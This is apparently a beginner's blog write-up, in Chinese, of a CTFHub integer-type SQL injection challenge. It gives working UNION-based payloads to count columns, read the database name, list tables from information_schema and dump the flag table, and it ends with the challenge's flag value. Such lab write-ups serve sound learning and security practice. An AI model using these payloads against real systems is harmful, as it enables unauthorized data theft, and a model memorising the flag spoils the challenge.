0
点赞
收藏
分享

微信扫一扫

(sql初学实践1)SQL 整数型注入--wp

哈哈镜6567 2022-05-03 阅读 65

进入环境:

只有输入1和2有回显

接着,判断列数:

依次输入

id=1 order by 1

id=1 order by 2

id=1 order by 3

到3时,没有回显,报错,说明这时表格只有两列

下一步

取得数据库名称:

1 and 0 union select 1,database()

 s数据库名称为sqli

下一步

爆表名

-1 union select  1,group_concat(table_name) from information_schema.tables where table_schema='sqli'  

得到两张表叫:flag,news

最后查询flag的内容:

-1 union select 1,group_concat(flag) from sqli.flag

 得到flag啦

Data: ctfhub{ef2998d666876bc013b9ae87}

 搞定啦!!!!=)

举报

相关推荐

0 条评论